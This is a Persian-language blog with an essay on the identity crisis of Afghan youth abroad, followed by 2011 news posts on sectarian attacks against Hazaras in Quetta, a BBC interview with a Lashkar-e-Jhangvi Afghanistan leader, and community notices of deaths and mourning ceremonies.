بحران هويت درميان جوانان

 

تهیه کننده: انجینر شهاب الدین " فیضی"

يکي ار دشواري هاي عام در ميان جوانان افغانستان بحران هويت است ، و يکي از عوامل اين بحران را مي توان زيستن در دوفرهنگ بيگانه و از هم متفاوت خواند . اینک  اندکي به گوشه هاي اين مشکل می پردازیم:
 يکي از ويژه گي هاي حيات اجتماعي فرهنگ انسان است که با تحولات اجتماعي طبيعتآ دگرگون مي شود . جوانان ما در غرب با حضور شان و با آموزش شان از زبان دوم يا زبان کشور ميزبان ، وارد يک دنياي جديد مي شوند . و در ين کنش هاي فرهنگي و اجتماعي الزامآ در زندگي شان نيز تحولاتي پديد ميايد و ما به عنوان يک فرهنگ ملي افغاني ، يک الگوي سيتماتيک نداريم . در افغانستان متآسفانه با اين بحران هايي که دچار بوديم جنگ و اقتصاد ناسازگار و امثال آن ، ما نتوانستيم از يک فرهنگ خرده پايي محلي به يک فرهنگ ملي برسيم . جوانان ما متآسفانه و با دلايل بسيار واضح از فرهنگ اصيل خود چندان آگاهي ندارند ، چون نه مدرسه بوده و نه مکتب ، و بنابر وجود مصايبي مجبور به فرار و اسکان گزيني در جايي ديگر شده اند ، بنابراين اگر بخواهيم يا نه ، تآثير گذاري هاي فرهنگ هاي ديگروبیگانه محسوس مي شود و بسيار مواردي که در فرهنگ ما قابل دفاع نيست طبيعتآ همه نابود مي شوند . مثل لنگي پوشيدن و نصوار کشيدن و پوشيدن شلوار هاي عجيب و غريب . از همه ي اينها که نام بردم اينهمه، طبيعتآ جاي خودرا به يک پديده ي تازه تري مي دهند و انساني که از محيط خودش کنده مي شود و به عنوان مهاجر در يک جامعه ديگر زندگي مي کند ، بسيار مشکل است ؛اينکه به جزء از بخش فرهنگ خود که در ضمير ذهني اش جاگير شده باشد ، ولي رويکرد هاي ديگر بسيار به سادگي جا عوض مي کند .
 تحميل نظريات بزرگان و سرسفيدان :
متآسفانه يا خوشبختانه بگويم ، يک ديدگاه تازه اينست که عصر امروز عصر موسفيدسالاری  نيست ، يعني اين که ديگر ريش سفيد يا موي سفيد عنوان معنويت و احترام رادر بین اجتماع ما قویا ندارد . در دنياي امروز غرب، ريش سفيد و موي سفيد ، علامت کهنگي و فرتوتي و پوسيده شدن را دارد وانسانها طبيعتآ بسوي جوان شدن ميل مي کنند که انعکاس اين مسآله را درپوشش ، درگفتار، درنشست ها و در انتخاب موسيقي و امثال آن صدق مي کند .
گذشته از آن يک نکته ديگر اين که، وقتي که برق و تلويزيون در يک خانه آمد، ما در برابر جهاني از زرق و برق ، همچنان کمپيوتر و دريچه هاي بسيارديگر که ما با آن به دنياي ديگر سفر مي کنيم و ما بدون يک پشتوانه فرهنگي قوي که متآسفانه نداريم ، مواجه مي شويم . متآسفانه که جوانان ما دارند بسوي يک اضمحلال فرهنگی مي روند.
 مشکلات فرهنگي و تحميل فرهنگ بيگانه: 
 راه هاي جلوگيري در برابر اين هجوم فرهنگي سازمان يافته اي غرب که مي خواهد يک الگوي جهاني باشد ، به باور من خيلي دشوار مي نمايد . بناءً بصورت روشن مي شود گفت که اين معضل فرهنگي اول در يک ساختار قدرت سياسي در افغانستان که همه چيز از بالا آغاز شده ، مي توانست يا مي تواند يک شکل منظم خودرا بگيرد که متآسفانه که ما در کشور خود افغانستان، اين بحران را بصورت بسيار واضح مشاهده مي نماييم ؛ چه در اتنخاب سرود ملي ، چه در انتخاب افراد و اشخاص و چه در انتخاب زبان ملي و امثال آن .
جمع اين عوامل دروني و بيروني ، اميدي را براي جوانان باقي نمي گذارند که بتوانند به عنوان يک الگوي انسجام يافته و سيستماتيک در غرب بتواند حضور پيدا بکنند.
عوامل فقر هنگی:
 فرهنگ يک ميراث اجتماعيست . مسلمآ وقتي که جامعه تغيير نکند فرهنگ هم از پويايي مي افتد . جامعه اي را که ما ديديم ، جامعه اي جنگ زده وعقب افتاده ، برعلاوه آن اقتدار منحط سياسي که از عقب ماندگي، عدم آگاهي مردم و ناپويايي فرهنگي سود بسيار بردند. و آگاهانه به جاي اين که مردم را بسوي باروري فرهنگي بکشانند ، مي برند بسوي مزخرفات مافيايي .

 مثلآ کشت کوکنار در افغانستان جزء فرهنگ نبود که امروز افغانستان نمادي شده شبيه کاليفرنياي دوم. با آنکه کشت کوکنار جزء فرهنگ ما نبود ، در وطن ما به قول ملل متحد بالاتر از پنج ميليارد دالر پول و عايد آن از اين منبع حرام است . از اين پنج ميليارد شايد 5ـ تا 10 نفري سود بگيرد نه همه ي ملت . ولي وقتي که مردم با چنين پديده ي روبرو مي شوند از لحاظ فرهنگي هم تآثير گذاري دارد. مردم مي روند بطرف جهان مافيايي که در آن همه ارزش هاي انساني مثل برادري خويشاوندي ، نوع دوستي ، مهمان نوازي ، غيرت و ... در برابر يک پديده ي بنام پول و زر اندوزي از بين مي رود و مضمحل مي شوند . 
 معنويت و فرهنگي را که ما تجربه کرده ايم در گذشته ها ، به عنوان يک فرهنگ اسلامي ووطني بودولي حالا تبارز فرهنگ جديد را هم ما در بدترين و شرم آور ترين شکل آن مي بينيم ؛اين که برادر کشي ها بخاطر پول و قدرت صورت گرفت . اينها جزء از عوامل وارد شده و ديکته شده و سازمان يافته براي سود و منفعت گذاري سياسي و قدرت طلبي است .
 نقش روشنفکر در جهت حل این معضل:
 روشنفکران افغانستان در مجموع خود دچار يک بحران سياسي هستند يک روشنفکري که ديروز از سوسياليزم دفاع مي کرد امروز مي بيند که دچار بحران هويت شده و در پهلوي امپرياليزم قرار مي گيرد . يک مسلماني که ديروز ادعاي اسلام مي کرد؛ مي رود در پهلوي امريکايي ها قرار مي گيرد و امثال آن .
روشنفکراني که هم نظريه پرداز بودند و هم در جنبه ي عملي فعال بودند ، اعتبار خود را از دست داده اندو در جامعه ديگر هويت روشنفکري از اعتباري که در دهه دموکراسی و  جنبش هاي فرهنگي سياسي  داشت وجود ندارد.
اينها در يک تطور تاريخي همه مضمحل شدند و فريب خورده از آب درآمدند . اينها همه يک طرف قضيه اند؛اماطرف ديگرقضیه  متاسفانه  در کشور خود افغانستان   به عنوان يک روشنفکر نخبه اي که ايجاد فکر نو برای این همه سرگیچی ها ومشکلات نماید  بسيار کم داريم. بايد افزود که ايجاد فکر و پرورش فرهنگي الزامآ بريک پشتوانه قوي اقتصادي نياز مند است که جمعي از روشنفکران با اين پشتوانه مي توانند وارد ميدان شوند.ولي روشنفکر ما به ويژه آنهايي که در غرب اند نان خوردن خودرا ندارند از صبح تا شام به جان کندن و مزدور کاري سرگردان اند که آنهم فقط مصارف شخصي و پرداخت محصول برق و آب آنان را به مشکل اکتفاء مي کند . بنابرين روشنفکر مجال فکر کردن را بسيار کم دارد و در نهايت اگر کاري مي کنند و به مسآله مي پردازد توجيه پردازي مي کنند و نمي تواند به شکل منظم و قوي وارد ميدان شود .

+ نوشته شده توسط آزادگان در 2012/1/9 و ساعت 5:9 PM |

گفت‌وگو با رهبر لشکر جنگوی افغانستان

در مورد انفجار عاشورا

یک گروه طرفدار طالبان به بی‌بی‌سی گفته است که انفجار یک مکان مقدس شیعیان در کابل بخشی از تلاش برای هدف قرار دادن شیعیان در این کشور بوده است.

لشکر جنگوی افغانستان یک گروه پیکارجوی نسبتا تازه تأسیس است که در هر دو سوی مرز پاکستان و افغانستان فعالیت می کند.

گفته می شود که این گروه تحت تأثیر لشکر جنگوی پاکستان، سازمان تندرویی است که اعضای آن تاکنون هزاران غیرنظامی را در پاکستان و افغانستان کشته اند.

در انفجار اخیر کابل دست کم ۷۱ نفر کشته شدند.

شعیب حسن، خبرنگار بی بی سی، در مکانی مخفی در بلوچستان پاکستان با علی شیر خدا، رهبر لشکر جنگوی افغانستان دیدار کرده است.

او به خبرنگار بی بی سی گفت که این گروه رسما انفجار کابل را تأیید نکرده، اما انکار نمی کند که یکی از اعضایش این انفجار را ترتیب داده است.

او همچنین تأکید کرد که انفجار کابل بخشی از نبرد با تبعیضی بوده است که "نخبگان شیعه حاکم در افغانستان" از آن برخورداند.

هنگامی که خبرنگار بی بی سی کشتار ده ها عزادار بی گناه را به عنوان روش مبارزه به چالش کشید، رهبر لشکر جنگوی افغانستان گفت که این تنها راه مقابله با "رفتار جنایتکارانه" شیعیان بوده است. او نصب پارچه نوشته های شیعیان در محله سنی ها را نمونه ای از این رفتار دانست.

شعیب حسن، خبرنگار بی بی سی این وضعیت را زنده کننده این نگرانی دانست که افغانستان ممکن است پس از خروج نیروهای نظامی بین المللی درگیر جنگ داخلی شود.

رئیس جمهوری افغانستان بارها گفته است که پاکستان با کمک به طراحی چنین حملاتی تلاش می کند اوضاع افغانستان را بی ثبات کند.

اما علی شیر خدا حمایت سرویس امنیتی پاکستان از گروه خود را تکذیب می کند.

او می گوید که اهل ولایت نیمروز و مثل بقیه اعضای گروهش شهروند افغانستان است.

منبع: سایت بی بی سی http://www.bbc.co.uk/persian/afghanistan/2011/12/111209_l10_afghan_lashkar_jhangvi_iv.shtml

+ نوشته شده توسط آزادگان در 2011/12/10 و ساعت 12:12 PM |

در یک حمله تروریستی در سریاب رود شهر کویته بازهم

 چهار هزاره شهید و دو نفر دیگر زخمی شدند!

 

واقعه ۲۰ سپتمبر که منجر به شهادت ۳۰ نفر از هزاره های مقیم شهر کویته شده بود از یاد مردم نرفته و مراسم فاتحه آنان خاتمه نیافته بودُ - متاسفانه حوالی ساعت ۵ عصر امروز بازهم تروریستان بیرحم چهار هزاره را در سریاب رود شهر کویته شهید و دو نفر دیگر را زخمی نمودند.

شاهدان عینی میگویند: تروریستان کوردل موتر حامل مسافرین را که از کویته بطرف مچ میرفت در ساحه سریاب رود متوقف و همانند مسافران بس زایرین سه روز قبل از موتر وین پایین و بالای تمام آنان تیر اندازی نموده چهار نفر را شهید دو نفر را مجروح نمودند. گفته میشود که تروریستان این کار را در مقابل چشمان مسافرین دیگر انجام داده اند. بعد از حادثه روز سه شنبه مورخ ۲۰ سپتامبر  که باعث شهادت تعداد ۲۷ نفر زایر در ساحه مستونگ و سه نفر دیگر در ساحه اختر آباد شد این دومین واقعه مشابه و المناک دیگر است که بالای مسافرین هزاره صورت می گیرد.

احتمال میرود لشکر جهنگوی مسئولیت این حمله را نیز همانند حملات قبلی برعهده بگیرند.   گزارش های تائیده نشده دیگر حاکیست یک تعداد مردم که بخاطر انتقال اجساد شهدا و مجروحان در محل حادثه میرفتند نیز مورد حمله قرار گرفته اند.

مردم میگویند شهدای امروز باشندگان هزاره تاون بودند که در معدن زغال سنگ مچ کار میکردند. کارگران معدن زغال سنگ بخاطر ادامه کار عصر روز جمعه دوباره سر کار میروند.

 

 
+ نوشته شده توسط آزادگان در 2011/9/23 و ساعت 9:6 PM |

بیشتر از 26 نفر زایر هزاره های کویته دریک حمله تروریستی

 در ساحه لکپاس شهید شدند! متأسفانه عصر امروز یک عراده بس زایرین که از کویته بطرف تفتان میرفت توسط نفر مسلح موتور
 سیکلت سوار متوقف و تمام سر نشینان هزاره آن را پایین و سپس آنها را در یک صف ایستاد
 مینمایند. بعد از صف نمودن آنان یک عراده موتر جیب پر از مردان مسلح  به محل رسیده و طور
 بیرحمانه بالای تمام آنان طور شلیک مینمایند. شاهدان عینی گفته اند که تعداد 20 نفر در جا شهید و
 چند نفر دیگر زخمی شدند و تروریستان بسیار به فکر آرام این کار را انجام داده و ساحه را بدون کدام
 خوف و هراس ترک نمودند. 

بعد از وقوع این حادثه چهار نفر دیگر که به

 قصد انتقال شهدا و زخمی ها عازم محل

 واقعه بودند، در ساحه اختر آباد مورد حمله

 قرار گرفته که متأسفانه تعداد سه تن آنان نیز

 شهید و یکنفر دیگر شان مجروح میشود.

 امبولانس های صحی شهدا و زخمی های

 حادثه را به شفاخانه بولان انتقال داده

 اند.  مسئولیت حمله تروریستی امروز را

 بازهم لشکر جهنگوی برعهده گرفته است.   

مقامات شفاخانه ها وضعیت صحی بعضی از مجروحان را وخیم خوانده و از مردم تقاضا نموده اند که

 بخاطر اهدای خون به شفاخانه مراجعه نمایند! 

گفته میشود که در پیوند به این رویداد تا حال کسی از سوی پولیس دستگیر نشده اما پولیس گفته است که تحقیقات را در

 این زمینه آغاز نموده اند.

+ نوشته شده توسط آزادگان در 2011/9/20 و ساعت 9:26 PM |
 

کارت مهاجرت

که از محل حملات انتحاری شهر کویته بدست آمده بود

جعلی بر آمد!

مسئولین امنیتی شهر کویته بعد از وقوع حملات انتحاری روز چهار شنبه هفته گذشته گفته بودند که نام انتحار کننده دومی احمد گل ولد سعید گل می باشد که باشنده اصلی ولسوالی امام صاحب ولایت کندز بوده و کارت مهاجرت خویش را از ایالت خیبر پشتونخواه بدست آورده است. بعد از این گفته ها پولیس بلوچستان، مهاجرین را از مناطق مختلف این ایالت دستگیر نمودند که رسانه ها گزارش دادند " کارت مهاجرت بدست آمده از محل واقعه جعلی بر آمد و تیم تحقیقاتی به مشکلات زیاد مواجه گردیده اند و هیچ اداره ی با آنها همکاری نکرده است ."

صبح روز چهارشنبه مورخ 7 سپتمبر 2011 میلادی حمله انتحاری که بالای منزل آقای فرخ شهزاد معاون پولیس سرحدی ایالت بلوچستان در شهر کویته صورت گرفت که باعث کشته و زخمی شدن تعداد زیادی از مردم بیگناه شهر کویته شد و در حملات متذکره آقای فرخ شهزاد مجروح و خانم شان نیز کشته شد.
 ساعات پس از وقوع حملات انتحاری رسانه های تصویری پاکستان به نقل از مقامات امنیتی شهر کویته گزارش دادند که انتحار کننده دومی یک مهاجر افغان بنام احمد گل ولد سعیدگل باشنده اصلی ولسوالی امام صاحب ولایت کندز بوده که کارت مهاجرت خویش را از ایالت خیبر پشتونخواه بدست آورده است. روز پنجشنبه کاپی کارت مهاجرت نامبرده در روزنامه های چاپ بلوچستان به نشر رسید و رسانه ها به نقل از وزیر داخله پاکستان گزارش دادند که مهاجرین باید تحت نظر قرار گیرند و نا امنی پاکستان ارتباط مستقیم به موجودیت مهاجرین افغان دارد.
 متأسفانه بعد از اعلام نام احمد گل ولد سعید گل به عنوان یک تبعه افغانی در رسانه ها زندگی آرام مهاجرین به چالش کشیده شد و ذهنیت منفی را در قبال آنان ببار آورد و پولیس شروع به دستگیری مهاجرین نمودند که قرار اطلاع بیشتر از 160 نفر مهاجر راجستر شده و راجستر ناشده از سوی نیروهای امنیتی از مناطق مختلف بلوچستان باز داشت شده اند. به تعقیب آن روزنامه ها از جمله روزنامه جنگ چاپ کویته روز یکشنبه مورخ 11 سپتامبر 2011 گزارش داد که " کارت مهاجرت بدست آمده از محل واقعه جعلی بر آمد و تیم تحقیقاتی به مشکلات زیاد مواجه گردیده و هیچ اداره با آنها همکاری نکرده است."

+ نوشته شده توسط آزادگان در 2011/9/16 و ساعت 12:22 PM |
 

در دو حمله انتحاری در کویته

 25 نفر کشته و بیشتر از 40 نفر دیگر زخمی شدند!

 
صبح امروز شهر کویته آماج دو حمله انتحاری قرار گرفت که هر دو حمله در مقابل دفتر کمیشنر کویته که در نزدیکی دفتر وزیر اعلی و والی بلوچستان و جنرال قونسلگری جمهوری اسلامی افغانستان قرار دارد، صورت گرفت. حمله اولی بسیار نیرومند و قوی بود که تمام شهر کویته را لرزاند و حمله دومی چند دقیقه بعد از حمله اولی صورت گرفت که باعث تلفات بیشتر گردید. فرمانده پولیس کویته گفته است که حمله اولی توسط یک موتر پجیرو صورت گرفته و به تعقیب آن حمله کننده انتحاری وارد منزل معاون نیروهای سرحدی بلوچستان گردیده و به سوی محافظین خانه و معاون نیروهای سرحدی و فامیلش تیر اندازی و سپس خودش را منفجر ساخت که در نتیجه آقای کرنل فرخ شهزاد معاون سپاه مرزی بلوچستان زخمی - خانم و دو سرباز این سپاه کشته شدند.  کرنل خالد یکی از افسران بلند رتبه ارتش نیز در این حادثه کشته شده است. در میان کشته شدگان و مجروحان حملات متذکره سه طفل نیز کشته و زخمی شده است.
 مسئولین شفاخانه ها در ساعات اولیه بعد از وقوع حملات از آوردن تعداد زیاد مجروحان به شفاخانه ها خبر داده گفتند که شفاخانه بخاطر مداوای مجروحان به کمبودی خون مواجه شده و احتمال دادند که تعداد قربانیان افزایش یابد.
 بعد از وقوع حملات انتحاری - نیروهای امنیتی محل واقعه را تحت محاصره شان قرار داده و به کسی اجازه ورود  به محل حادثه را نمیدادند.   صدای امبولانس ها از چهار طرف تا ظهر امروز به گوش می رسید. با آنکه وقوع حملات امروز فاصله زیاد به ساختمان جنرال قونسلگری جمهوری اسلامی افغانستان نداشت- اما خوشبختانه به ساختمان و کارمندان جنرال قونسلگری جمهوری اسلامی افغانستان کدام آسیبی نرسید. اما تعدادی زیادی از منازل رهایشی و دفاتر رسمی که در نزدیکی دفتر کمیشنر کویته قرار داشت تخریب و شیشه های آنها فرو ریخته است.
طالبان پاکستان مسئولیت حمله امروز را پذیرفته و گفته اند که حملات امروز در واکنش به دستگیری یونس الموریطانی یکی از فرماندهان ارشد القاعده که سه روز قبل توسط دستگاه استخباراتی " آی ایس آی" و نیروهای سپاه مرزی با دو نفر دیگر این شبکه از کویته دستگیر شده بودند، انجام داده اند.
پولیس گفته است که تحقیقات گسترده را آغاز نموده تا طراحان حملات امروز را شناسایی و به جزای اعمال شان برسانند.
 
 
+ نوشته شده توسط آزادگان در 2011/9/7 و ساعت 9:49 PM |

سه قوماندان ارشد القاعده در کویته دستگیر شدند!

تلویزیون های پاکستان عصر امروز گزارش دادند که سازمان استخباراتی " آی ایس آی " و " فرنتیر کور " ( ایف سی ) در یک عملیات مشترک یونس الموریطانی یکی از قوماندانان ارشد القاعده را با دو قوماندان دیگر بنام های عبدالغفار الشامی و سیر الشامی در شهر کویته پاکستان بازداشت نمودند. رسانه ها به نقل از  آی ایس پی آر گفته اند که یونس الموریطانی برخلاف منافع امریکا در سطح جهانی متهم می باشد. رسانه ها به نقل از منابع نظامی پاکستان در گزارشهای خود افزوده اند که دولت پاکستان هر سه قوماندان دستگیر شده را به امریکا انتقال داده است. دستگیری این سه فرمانده ارشد می تواند موفقیت دیگر برای بهتر شدن روابط از هم گسیخته پاکستان و امریکا گردد که بعد از کشته شدن اسامه بن لادن بهم خورده است. حضور شورای طالبان در کویته نیز یکی از موضوعات جنجال بر انگیز دیگر در رسانه هاست که آیا پاکستان بر ضد این شورا نیز وارد عمل خواهد شد یاخیر؟

+ نوشته شده توسط آزادگان در 2011/9/6 و ساعت 8:12 PM |

دشمنان انسانیت 


در روز  اول عید سعید فطر در کویته فاجعه آفریدند!


 یک حمله کننده انتحاری قبل از ظهر  روز اول عید که به قصد از بین بردن نماز گزاران عید گاه که در سرک عمومی علمدار ( رود ) شهر کویته موقعیت داردخودش را در 300 متری آن در سرک گلستان تاون مهر آباد منفجر ساخت. 

شاهدان عینی می گویند که صدها نفر از مردم محل در نماز عید شرکت کرده بودند و بعد از ختم نماز دسته دسته در حال خارج شدن از عیدگاه بودند که انفجار بسیار  نیرومند در نزدیکی عید گاه صورت گرفت که خوشبختانه شخص انتحار کننده به اساس تدابیر امنیتی  که توسط جوانان منطقه در نظر گرفته شده بود موفق به رسیدن در عید گاه نشد و خودش را با موتر حاملش انفجار داد که متأسفانه یک تعداد افراد رهگذر  بشمول یک تعداد از نماز گزاران که زود تر از عید گاه خارج شده بودند شهید و زخمی شدند و موتر های  که در نزدیکی موتر  انتحار کننده قرار داشتند نیز حریق و چندین باب منزل مسکونی و دکان کاملاً از بین رفته و شیشه های خانه ها و دکانهای اطراف محل واقعه فرو ریختند. وقوع حمله انتحاری در روز اول عید سعید فطر، عید را بیشتر از پیش بکام مردم و شهر وندان کویته تلخ ساخت.  اکثر مردم بعد ازادای نماز عید به رسم احترام در خانه های شهدای واقعات قبلی می رفتند که این واقعه دلخراش بوقوع پیوست و دشمنان انسان و انسانیت آخرین کینه و کدورت و نا انسانی شان را با انجام  این حمله ناجوانمردانه  به نمایش گذاشتند. گفته میشود که در دو روز اخیر دو زخمی دیگر نیز به رحمت حق رفتند. رئیس جمهور، نخست وزیر، وزیر داخله، مقامات حکومتی بشمول احزاب سیاسی حمله را شدیداً محکوم و وزیر داخله لشکر جهنگوی و طالبان را مسئول این حمله خوانده و  از  تداوم مبارزه حکومت بر ضد آنان خبر داد. کمیته سوگواری شیعیان شهر کویته هفت روز را سوگواری عمومی نموده حزب هزاره دموکراتیک با نهاد های سیاسی، اجتماعی، فرهنگی و مدنی شهر کویته و ایالت بلوچستان خواهان دستگیری فوری عاملان این رویداد شدند.  ناظران معتقد اند که حمله پیش از پیش طراحی شده بود تا تروریستان فرقه گرا عرصه را برای هزاره های کویته تنگ تر بسازند که به فضل و مرحمت الهی پلان شوم آنان تطبیق نشده و شخص انتحار کننده خودش را نا رسیده در عیدگاه منفجر ساخت و اگر احیاناً شخص انتحار کننده خودش را در داخل و یا در دهن دروازه عیدگاه انفجار، احتمالاً صدها نفر شهید و زخمی میشدند

+ نوشته شده توسط آزادگان در 2011/9/6 و ساعت 8:11 PM |
 

در یک حادثه ترافیکی در شاهراه چمن - کویته

 

۱۳ نفر جانهایشان را از دست دادند. 

متاسفانه عصر روز پنجشنبه مورخ 27 اسد سالجاری در یک حادثه ترافیکی در شاهراه چمن - کویته تعداد 8 نفر هزاره و 9 نفر پشتون جانهایشان را از دست دادند.  در این حادثه یزدان زیرک و پنج نفر از خانواده اش  و نجیبب الله حسینی محصل سال سوم فاکولته انجنیری دانشگاه پولتخنیک از ساحه داود جاغوری و یکنفر از برادران شهرستان ولایت دایکندی بشمول  ۵ نفر از برادران پشتون در این حادثه به شهادت رسیدند. این حادثه در شاهراه چمن - کویته در ساحه سر انان صورت گرفته که تمام سرنشینان هر دو موتر جانهایشان را از دست دادند. مردم محل اجساد قربانیان این حادثه المناک را در شفاخانه منطقه پشین انتقال داده بودند که شب جمعه جمعی از برادران حزب هزاره دموکراتیک و اقارب انجنیر نجیب الله حسینی شب هنگام در پشین رفته و پیکر تعداد 8 نفر را که متعلق به مردم هزاره بود ساعت 2:30 شب به امامبارگاه حضرت علی ابن ابیطالب ساحه هزاره تاون کویته منتقل و بعد از ظهر روز جمعه در قبرستانی هزاره تاون به خاک سپردند. در جمع قربانیان دو زن و دو طفل کوچک نیز شامل می باشد. بنده وقوع این حادثه را به تمام خانواده های داغدار شان تسلیت گفته و برای کسانی که جانهایشان را از دست داده اند بهشت برین و برای بازماندگانشان صبر جمیل آرزو می نمایم. قرار است فاتحه یزدان و اعضای خانواده مرحوم مغفور روز دوشنبه در امامبارگاه علی ابن ابیطالب واقع حسین آباد هزاره تاون برگزار شود و همچنین مجلس فاتحه و قرآن خوانی انجنیر نجیب الله حسینی بعد از تشریف آوری برادر بزرگش در کویته برگزار خواهد شد.

 

+ نوشته شده توسط آزادگان در 2011/8/20 و ساعت 11:26 PM |

یک جوان هزاره توسط سارقین مسلح

در A One City هزاره تاون کشته شد!

تاریخ: ۱۳ اگست ۲۰۱۱ میلادی

یک جوان هزاره بنام میرداد که باشنده دره کاکی جانی مهر آباد شهر کویته می باشد ساعت ۴ بعد از ظهر امروز در سرک A One City هزاره تاون توسط دو نفر موتور سیکلیت سوار مسلح به ضرب گلوله کشته شد و سارقین مسلح بعد از کشتن آن موتر سیکلیت وی را نیز با خود برده و از ساحه فرار نمودند. شاهدان عینی می گویند که دو نفر موتور سیکلیت سوار در سرک A One City هزاره تاون راه جوان هزاره را سد نموده و خواستند که موتور سیکلیت وی را از وی به زور بگیرند که جوان هزاره مقاومت نمود و بعد از چند لحظه مقاومت یکتن از سارقین با تفنگچه بسوی جوان هزاره تیر اندازی نموده ووی را به قتل رساند و سپس یکی آنان موتورسیکلیت مقتول را سوار شده از ساحه فرار نمودند. بعد از سپری شدن چند دقیقه مردم محل و پولیس جسد مقتول را به شفاخانه بولان منتقل و بعد به ورثای نامبرده تحویل دادند. جسد میرداد حوالی شام امروز در هزاره قبرستان مهر آباد به خاک سپرده شد. پولیس گفته است که تحقیقات را در زمینه آغاز نموده ولی تا حال کسی را به ظن دست داشتن به این رویداد دستگیر و یا باداشت ننموده است. بعد از چندین حمله تروریستی بالای هزاره های شهر کویته در مناطق مختلف این شهر این یک واقعه دلخراش دیگری است که بوقوع می پیوندد و منجر به کشته شدن یک نفر میشود. سرقت موتور سیکلیت همیشه با خونریزی توآم بوده در صورتی که مالک موتور سیکلیت در برابر سارقین مقاومت کند حتماً کشته می شوند. مردم نسبت به حادثه امروز یکبار دیگر بازهم وحشت زده شده و خود شان را در موقع رفت و آمد از یک ساحه به ساحه دیگر شهر مصئون احساس نمی نمایند.

+ نوشته شده توسط آزادگان در 2011/8/13 و ساعت 10:57 PM |

پدر استاد خلیلی معاون دوم ریاست جمهوری درگذشت


انا لله و انا اليه راجعون


محترم الحاج محمد اسلم پدر استاد خلیلی معاون دوم ریاست جمهوری و رهبر حزب وحدت اسلامی افغانستان روز پنجشنبه در روز چهارم ماه مبارک رمضان ( ماه مهمانی خدا ) مورخ 13 اسد سالجاری در گذشت.  در مورد علت درگذشت پدر استاد خلیلی تا کنون چیزی گفته نشده است، اما احتمال می رود که ایشان از اثر کهولت سنی داعی اجل را لبیک گفته باشد. 

 جنازه آن مرحوم امروز ساعت هشت و نیم صبح امروز  ، روز جمعه 14 اسد ساعت 8 و نيم قبل از ظهر از مسجد جامع نبي اکرم (ص) واقع در شهرک اميد سبز، برداشته و با حضور مقامات ارشد حکومتی، اعضای مجلسین نمایندگان،سفارت خانه های کشور های دوست در حزیره دامنه کوه قوریق ( قوریغ ) به خاک سپرده شد. 

احتمال می رود فاتحه مرحوم مغفور نیز در مسجد جامع نبي اکرم (ص) واقع در شهرک اميد سبز، برگزار  گردد. 

اینجانب درگذشت مرحومی را به جلالتمأب محترم استاد خلیلی، خانواده محترم، دوستان و اقارب مرحوم مغفور از اعماق قلب تسلیت گفته و خود را در این اندوه بزرگ شریک می دانم. براي شاد روان و مرحوم مغفور، رحمت و بخشش خداوند و براي جلالتمأب استاد خلیلی و سایر بازماندگان و دوستان مرحوم صبر جميل و اجر جزيل از خداوند متعال آرزو داریم. 

+ نوشته شده توسط آزادگان در 2011/8/5 و ساعت 1:23 PM |

 

مراسم فاتحه خوانی شهدای حادثه دیروز در کویته برگزار شد!

عکس فاتحه قبلی.

تاریخ: ۳۱ جولای ۲۰۱۱ میلادی.
مراسم فاتحه خوانی شهدای حادثه دیروز، از ساعت 8 صبح الی 12 ظهر امروز طور دستجمعی از سوی خانواده ها و وابستگان آنان با شرکت هزاران نفر از شهروندان شهید پرور شهر کویته و هزاره تاون در امامبارگاه " پنجتن " در ساحه علی آباد هزاره تاون برگزار گردید. این دومین فاتحه عمومی شهدا در هزاره تاون است که امسال برگزار میگردد.
اعتصاب ( هرتال ) اعلان شده حزب
هزاره دموکراتیک پارتی نیز امروز موفقانه به پایان رسید. پولیس کویته از راه اندازی یک عملیات بمنظور تصفیه عاملین نا امنی های اخیر خبر داده 
و گفته اند که عملیات را به زودی شروع خواهند کرد. رسانه ها گزارش دادند، که پولیس تعداد 120 نفر از مردم هزاره را دیروز از نواحی مختلف شهر کویته به اتهام بر هم زدن نظم شهر دستگیر نموده اند. مردم معترض ساحه هزاره تاون که سرک بیپاس را به نشانه اعتراض به روی ترافیک بسته بودند، بعد از مراجعه مستمر مقامات امنیتی یکی از پیش شرط های شان را برعلاوه دستگیری عاملین حادثه - رهایی مردم گرفتار شده از سوی نیروهای امنیتی مطرح نموده بودندکه مقامات امنیتی پیش شرط آنان را پذیرفته بود و بعد از پذیرفتن پیش شرط مردم سرک بی پاس را به روی ترافیک باز نمودند. مردم می گویند که نیروهای امنیتی به وعده ی شان عمل ننموده و تا کنون گرفتار شدگان دیروز رها نکرده اند.
گزارش دیگر حاکی از آن است که یک تعداد از جوانان مردم هزاره صبح امروز بمنظور آگاهی دادن اعلام اعتصاب عمومی به دکانداران به میزان چوک رفته از دکاندارانی که دکانهای شان را نبسته بودند، تقاضا نمودند که دکانهای شان را بیبندند، که دعوت آنان از سوی دکانداران پذیرفته نمیشود و دکانداران از بسته نمودن دکانهای شان ابا میورزند، در این هنگام بگو مگو های لفظی میان دکانداران و جوانان هزاره رخ می دهد که پولیس در محل رسیده و بدون کدام دلیل تعداد 12 نفر از جوانان مردم هزاره را بازداشت می نمایند. نیروهای امنیتی جز بازداشت مردم هزاره از کوچه و بازار تا حال هیچگونه گزارشی را راجع به بازداشت عاملان قضیه دیروز منتشر نکرده اند. در حادثه دیروز تعداد 11 نفر در سپینی رود شهر کویته شهید و چهار تن دیگر مجروح شدند.
سوالی که در بین مردم مطرح است،این است که نیروهای امنیتی چرا بجای دستگیری تروریستان مردم معترض 
هزاره را بازداشت می نمایند؟
+ نوشته شده توسط آزادگان در 2011/7/31 و ساعت 10:27 PM |

تعداد 11 نفر از مردم هزاره در یک حمله تروریستی

شهید و 4 نفر دیگر در کویته مجروح شدند.

تاریخ: ۳۰ جولای ۲۰۱۱ میلادی.

بعد از چند روز آرامش و نزدیک شدن به  ماه مبارک رمضان،  متأسفانه صبح امروز بازهم موتر سوزوکی لینی که با مسافرین اش از هزاره تاون علمدار رود به سوی علمدار رود می رفتند در سپینی رود شهر کویته مورد حمله دو نفر تروریست قرار گرفت ، که در نتیجه رضا دریور موتر سوزوکی، علی محمد، نورزوعلی، علی رضا، گل پری، لیاقت علی، محمد ابراهیم، سید عقیل، حسن آغا، رقیه مدیره لیسه علی مادل ( های سکول ) با یکنفر راننده رکشا که از برادران پشتون می باشد، شهید و نادر علی، داود، حلیمه بی بی و محمد موسی زخمی شدند. شاهدان عینی می گویند که دو نفر مسلح در نزدیکی اده موترها و شروع زمین های زراعتی در میان سرک ایستاد شده و یکنفر آن در ابتدا دریور سوزوکی را مورد حمله قرار داد و سپس موتر سوزوکی از جاده منحرف و نفر بعدی طور بیرحمانه بالای سر نیشنان سوزوکی تیر اندازی نموده و بعد از چند دقیقه تیر اندازی ساحه را ترک گفتند. 